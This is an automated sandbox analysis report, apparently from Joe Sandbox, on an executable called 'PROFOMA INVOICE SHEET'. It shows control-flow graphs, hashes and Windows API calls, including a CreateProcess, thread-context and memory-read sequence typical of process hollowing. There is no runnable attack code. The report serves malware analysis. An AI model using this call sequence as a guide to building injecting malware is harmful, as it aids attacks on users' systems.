                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: 6ea0db19f57f6c26d533c823129111118889745d9c7d03d076f1d4bcdd3c34bf
                                    • Instruction ID: 71be5a203ac25038ed11627d6cfd61507ce7f54ef9d6a227f714538e50548621
                                    • Opcode Fuzzy Hash: 6ea0db19f57f6c26d533c823129111118889745d9c7d03d076f1d4bcdd3c34bf
                                    • Instruction Fuzzy Hash: 0B112AB5521208FFDB228FA5DC95AAFBBBCEF04748F11445AA805D7250D231DE449760

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1740 3dba710-3dba7b0 call 3dbcba0 * 3 1747 3dba7b2-3dba7bc 1740->1747 1748 3dba7c7 1740->1748 1747->1748 1749 3dba7be-3dba7c5 1747->1749 1750 3dba7ce-3dba7d7 1748->1750 1749->1750 1751 3dba7de-3dbae90 1750->1751 1752 3dbaea3-3dbaed0 CreateProcessW 1751->1752 1753 3dbae92-3dbae96 1751->1753 1761 3dbaeda 1752->1761 1762 3dbaed2-3dbaed5 1752->1762 1754 3dbae98-3dbae9c 1753->1754 1755 3dbaedc-3dbaf09 1753->1755 1756 3dbae9e 1754->1756 1757 3dbaf15-3dbaf42 1754->1757 1773 3dbaf0b-3dbaf0e 1755->1773 1774 3dbaf13 1755->1774 1760 3dbaf4c-3dbaf66 Wow64GetThreadContext 1756->1760 1757->1760 1782 3dbaf44-3dbaf47 1757->1782 1764 3dbaf68 1760->1764 1765 3dbaf6d-3dbaf88 ReadProcessMemory 1760->1765 1761->1760 1766 3dbb2d1-3dbb2d3 1762->1766 1770 3dbb27a-3dbb27e 1764->1770 1767 3dbaf8a 1765->1767 1768 3dbaf8f-3dbaf98 1765->1768 1767->1770 1771 3dbaf9a-3dbafa9 1768->1771 1772 3dbafc1-3dbafe0 call 3dbc220 1768->1772 1775 3dbb2cf 1770->1775 1776 3dbb280-3dbb284 1770->1776 1771->1772 1778 3dbafab-3dbafba call 3dbc170 1771->1778 1789 3dbafe2 1772->1789 1790 3dbafe7-3dbb00a call 3dbc360 1772->1790 1773->1766 1774->1760 1775->1766 1779 3dbb299-3dbb29d 1776->1779 1780 3dbb286-3dbb292 1776->1780 1778->1772 1795 3dbafbc 1778->1795 1785 3dbb2a9-3dbb2ad 1779->1785 1786 3dbb29f-3dbb2a2 1779->1786 1780->1779 1782->1766 1791 3dbb2b9-3dbb2bd 1785->1791 1792 3dbb2af-3dbb2b2 1785->1792 1786->1785 1789->1770 1799 3dbb00c-3dbb013 1790->1799 1800 3dbb054-3dbb075 call 3dbc360 1790->1800 1793 3dbb2ca-3dbb2cd 1791->1793 1794 3dbb2bf-3dbb2c5 call 3dbc170 1791->1794 1792->1791 1793->1766 1794->1793 1795->1770 1802 3dbb04f 1799->1802 1803 3dbb015-3dbb046 call 3dbc360 1799->1803 1807 3dbb07c-3dbb09a call 3dbcbc0 1800->1807 1808 3dbb077 1800->1808 1802->1770 1809 3dbb048 1803->1809 1810 3dbb04d 1803->1810 1813 3dbb0a5-3dbb0af 1807->1813 1808->1770 1809->1770 1810->1800 1814 3dbb0b1-3dbb0e3 call 3dbcbc0 1813->1814 1815 3dbb0e5-3dbb0e9 1813->1815 1814->1813 1816 3dbb0ef-3dbb0ff 1815->1816 1817 3dbb1d4-3dbb1f1 call 3dbbd70 1815->1817 1816->1817 1820 3dbb105-3dbb115 1816->1820 1825 3dbb1f8-3dbb217 Wow64SetThreadContext 1817->1825 1826 3dbb1f3 1817->1826 1820->1817 1823 3dbb11b-3dbb13f 1820->1823 1827 3dbb142-3dbb146 1823->1827 1828 3dbb21b-3dbb226 call 3dbc0a0 1825->1828 1829 3dbb219 1825->1829 1826->1770 1827->1817 1830 3dbb14c-3dbb161 1827->1830 1836 3dbb22a-3dbb22e 1828->1836 1837 3dbb228 1828->1837 1829->1770 1832 3dbb175-3dbb179 1830->1832 1834 3dbb17b-3dbb187 1832->1834 1835 3dbb1b7-3dbb1cf 1832->1835 1838 3dbb189-3dbb1b3 1834->1838 1839 3dbb1b5 1834->1839 1835->1827 1840 3dbb23a-3dbb23e 1836->1840 1841 3dbb230-3dbb233 1836->1841 1837->1770 1838->1839 1839->1832 1843 3dbb24a-3dbb24e 1840->1843 1844 3dbb240-3dbb243 1840->1844 1841->1840 1845 3dbb25a-3dbb25e 1843->1845 1846 3dbb250-3dbb253 1843->1846 1844->1843 1847 3dbb26b-3dbb274 1845->1847 1848 3dbb260-3dbb266 call 3dbc170 1845->1848 1846->1845 1847->1751 1847->1770 1848->1847
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03DBAECB
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03DBAF61
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03DBAF83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                    • Instruction ID: a42d24a3bbe7b7aad059ff3bbb21f0411592e06f23121d366c33a5c386a30798
                                    • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                    • Instruction Fuzzy Hash: 1162FA30A14258DBEB24CFA4C850BDEB376EF58700F1091A9E10DEB390E7759E85CB59

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1850 303923-303939 1851 303a13-303a17 1850->1851 1852 30393f-303954 call 306270 1850->1852 1855 343393-3433a2 LoadStringW 1852->1855 1856 30395a-303976 call 306b57 1852->1856 1858 3433ad-3433b6 1855->1858 1862 30397c-303980 1856->1862 1863 3433c9-3433e5 call 306350 call 303fcf 1856->1863 1860 303994-303a0e call 322340 call 303a18 call 324983 Shell_NotifyIconW call 30988f 1858->1860 1861 3433bc-3433c4 call 30a8c7 1858->1861 1860->1851 1861->1860 1862->1858 1865 303986-30398f call 306350 1862->1865 1863->1860 1876 3433eb-343409 call 3033c6 call 303fcf call 3033c6 1863->1876 1865->1860 1876->1860
                                    APIs
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003433A2
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00303A04
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_wcslen
                                    • String ID: Line:
                                    • API String ID: 2289894680-1585850449
                                    • Opcode ID: 82512e3e7ee529dbe3267846e177a5ec85ca5a40e75d94b9c7b1b8ebca1fde87
                                    • Instruction ID: 8a6263a5fdccb514fc666119560867d349efff03fe557d0cff49d2d6f9c42e0c
                                    • Opcode Fuzzy Hash: 82512e3e7ee529dbe3267846e177a5ec85ca5a40e75d94b9c7b1b8ebca1fde87
                                    • Instruction Fuzzy Hash: 6631A27151A300ABD727EB24EC66BEBB7DCAB40710F00492BF599971D1DB709A49C7C2
                                    APIs
                                    • GetOpenFileNameW.COMDLG32(?), ref: 00342C8C
                                      • Part of subcall function 00303AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00303A97,?,?,00302E7F,?,?,?,00000000), ref: 00303AC2
                                      • Part of subcall function 00302DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00302DC4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Name$Path$FileFullLongOpen
                                    • String ID: X$`e<
                                    • API String ID: 779396738-2653119291
                                    • Opcode ID: f53101c648e109f418340a2d9acbcceeeb92fd3ca507ddccbd2f653cf9a514d1
                                    • Instruction ID: 0735675debd9cad9388f9dee973c64f9ba0edaf1489a5ab82ba1842aae1f7e65
                                    • Opcode Fuzzy Hash: f53101c648e109f418340a2d9acbcceeeb92fd3ca507ddccbd2f653cf9a514d1
                                    • Instruction Fuzzy Hash: A321C670A002589BCB02DF94C859BDE7BFC9F49304F00405AE405FB281DBB49A89CF61
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00320668
                                      • Part of subcall function 003232A4: RaiseException.KERNEL32(?,?,?,0032068A,?,003D1444,?,?,?,?,?,?,0032068A,00301129,003C8738,00301129), ref: 00323304
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00320685
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw$ExceptionRaise
                                    • String ID: Unknown exception
                                    • API String ID: 3476068407-410509341
                                    • Opcode ID: 8bca53887294143395f53f77bb7e4c425b7cfabd95242d5c0c61153d01175edc
                                    • Instruction ID: 45f4e198a85fbf4aa0a938f59f596b844e0c7dce456c02943ed249deac345b54
                                    • Opcode Fuzzy Hash: 8bca53887294143395f53f77bb7e4c425b7cfabd95242d5c0c61153d01175edc
                                    • Instruction Fuzzy Hash: 6CF0AF3490021DABCB0AB7A4F846DAE7B6C9E00310B604535B914DA996EF71DB698680
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 003882F5
                                    • TerminateProcess.KERNEL32(00000000), ref: 003882FC
                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 003884DD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$CurrentFreeLibraryTerminate
                                    • String ID:
                                    • API String ID: 146820519-0
                                    • Opcode ID: dad776ef19108dad755d03be636a9c7b669a84ed8d424a32ca09ef46b5a48b9b
                                    • Instruction ID: 0b32e043e01460e6e0fe180ceb4a3ba897f6c4fd4d98eb0b82486dc166017b5e
                                    • Opcode Fuzzy Hash: dad776ef19108dad755d03be636a9c7b669a84ed8d424a32ca09ef46b5a48b9b
                                    • Instruction Fuzzy Hash: 8F126B719083019FC725DF28C484B6ABBE5BF89314F55899DE8898B292CB31ED45CF92
                                    APIs
                                      • Part of subcall function 00301BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00301BF4
                                      • Part of subcall function 00301BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00301BFC
                                      • Part of subcall function 00301BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00301C07
                                      • Part of subcall function 00301BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00301C12
                                      • Part of subcall function 00301BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00301C1A
                                      • Part of subcall function 00301BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00301C22
                                      • Part of subcall function 00301B4A: RegisterWindowMessageW.USER32(00000004,?,003012C4), ref: 00301BA2
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0030136A
                                    • OleInitialize.OLE32 ref: 00301388
                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 003424AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                    • String ID:
                                    • API String ID: 1986988660-0
                                    • Opcode ID: acb20e372295f52ce2564b694932506626ec88a8ea242c4ebb1724ff6961d1b1
                                    • Instruction ID: 2e370e4e3f060b330da69a5ac674c16e5521e059bfb96918d44d0fce141385d9
                                    • Opcode Fuzzy Hash: acb20e372295f52ce2564b694932506626ec88a8ea242c4ebb1724ff6961d1b1
                                    • Instruction Fuzzy Hash: 0571B2B9A13204AFC787DFB9B9556553BFABB8A344B44426BD40AC73A2E7384444CF40
                                    APIs
                                    • CloseHandle.KERNELBASE(00000000,00000000,?,?,003385CC,?,003C8CC8,0000000C), ref: 00338704
                                    • GetLastError.KERNEL32(?,003385CC,?,003C8CC8,0000000C), ref: 0033870E
                                    • __dosmaperr.LIBCMT ref: 00338739
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLast__dosmaperr
                                    • String ID:
                                    • API String ID: 2583163307-0
                                    • Opcode ID: aa8816db35906bd62fdeae052fd483ddc41b8383149647b935d244bb01ba9d2e
                                    • Instruction ID: aaaf36d9cbbc838d41a41df3f9a09c44b0b1b09fed5c6ecb1a237e553cbe6201
                                    • Opcode Fuzzy Hash: aa8816db35906bd62fdeae052fd483ddc41b8383149647b935d244bb01ba9d2e
                                    • Instruction Fuzzy Hash: A5014E3670572017D677633469C777E675D4B82774F3A021AF9159F1D2DEA1CC818150
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 003117F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: CALL
                                    • API String ID: 1385522511-4196123274
                                    • Opcode ID: d39ed21bd0cc716a7dd0d51607847fadea11281fecfadb83c63ab31268eae74e
                                    • Instruction ID: d886459ff492a02c0159dd651565c51c0b8c118e32b069d7823250b427247939
                                    • Opcode Fuzzy Hash: d39ed21bd0cc716a7dd0d51607847fadea11281fecfadb83c63ab31268eae74e
                                    • Instruction Fuzzy Hash: 8C22AC706083019FC71ADF14C491BAABBF6BF89314F14891DF9968B3A1D731E885CB92
                                    APIs
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00303908
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_
                                    • String ID:
                                    • API String ID: 1144537725-0
                                    • Opcode ID: 476e086aafd6bca3bff7551b6262e128f2ad2bbefbaac1072ac3f12af5a79e92
                                    • Instruction ID: 74ffcc0359fe4838912dd7af9cfc8028782bf5be505237f4c1a0d7f979b7325c
                                    • Opcode Fuzzy Hash: 476e086aafd6bca3bff7551b6262e128f2ad2bbefbaac1072ac3f12af5a79e92
                                    • Instruction Fuzzy Hash: FD31C1746063019FD322DF24E894797BBECFB49308F00096EF59987280E7B1AA48CB52
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0030949C,?,00008000), ref: 00305773
                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0030949C,?,00008000), ref: 00344052
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 3a973de6d8f2c48e9dfbd09752d34b001a3aa6ca58a0bbcf6a9a1baa163b9cf7
                                    • Instruction ID: d6ef4c03d5db351862812afe717a2af53f61a33ed5077087765b17a9c84c4a8e
                                    • Opcode Fuzzy Hash: 3a973de6d8f2c48e9dfbd09752d34b001a3aa6ca58a0bbcf6a9a1baa163b9cf7
                                    • Instruction Fuzzy Hash: C6017531146325B6E3324A2ADC1EF977F98EF02BB0F158311BA9C5E1E0CBB45854DB94
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03DBAECB
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03DBAF61
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03DBAF83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                    • Instruction ID: 271617cf60e312f86d204cad691c86561c7d519bb983ae44d295ca87ea437f13
                                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                    • Instruction Fuzzy Hash: 3012CE24E24658C6EB24DF64D8507DEB232EF68700F1090E9910DEB7A5E77A4F81CF5A
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: b33d7236fd5786277b3524d1e81a9edc47fc609ffa70a754de41f0ac4678fea8
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: 3C31D575A00109DFC71ADF59E4809A9F7A5FF8D300B2586A5E80ACBA55D731EDC1DBC0
                                    APIs
                                      • Part of subcall function 00304E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00304EDD,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304E9C
                                      • Part of subcall function 00304E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00304EAE
                                      • Part of subcall function 00304E90: FreeLibrary.KERNEL32(00000000,?,?,00304EDD,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304EC0
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304EFD
                                      • Part of subcall function 00304E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00343CDE,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304E62
                                      • Part of subcall function 00304E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00304E74
                                      • Part of subcall function 00304E59: FreeLibrary.KERNEL32(00000000,?,?,00343CDE,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304E87
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Library$Load$AddressFreeProc
                                    • String ID:
                                    • API String ID: 2632591731-0
                                    • Opcode ID: e474f451956be1a059b76c3e6b5557bbd9283dc87737b6d9716652acab871f47
                                    • Instruction ID: 041b2c47c0aa5b0ea4892b252f890c162a64d1eff26591564087ec296ca8587c
                                    • Opcode Fuzzy Hash: e474f451956be1a059b76c3e6b5557bbd9283dc87737b6d9716652acab871f47
                                    • Instruction Fuzzy Hash: B2112771611206ABCF16BB60DC22FAD77A49F40711F10842DF642AF1C1EEB0AF049B54
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: __wsopen_s
                                    • String ID:
                                    • API String ID: 3347428461-0
                                    • Opcode ID: 025d79265258d2e92648c429aa9bf7c8b5452f4161876f5bb74a3fb2d7a2cb13
                                    • Instruction ID: 7821dba44bcc771353cdc41f318e548e60bdbb4d6a5490fb17b340b7e21b6353
                                    • Opcode Fuzzy Hash: 025d79265258d2e92648c429aa9bf7c8b5452f4161876f5bb74a3fb2d7a2cb13
                                    • Instruction Fuzzy Hash: 96112A7590420AAFCF1ADF59E98199E7BF9EF48314F114059FC08AB312DB31EA11CBA5
                                    APIs
                                      • Part of subcall function 00334C7D: RtlAllocateHeap.NTDLL(00000008,00301129,00000000,?,00332E29,00000001,00000364,?,?,?,0032F2DE,00333863,003D1444,?,0031FDF5,?), ref: 00334CBE
                                    • _free.LIBCMT ref: 0033506C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
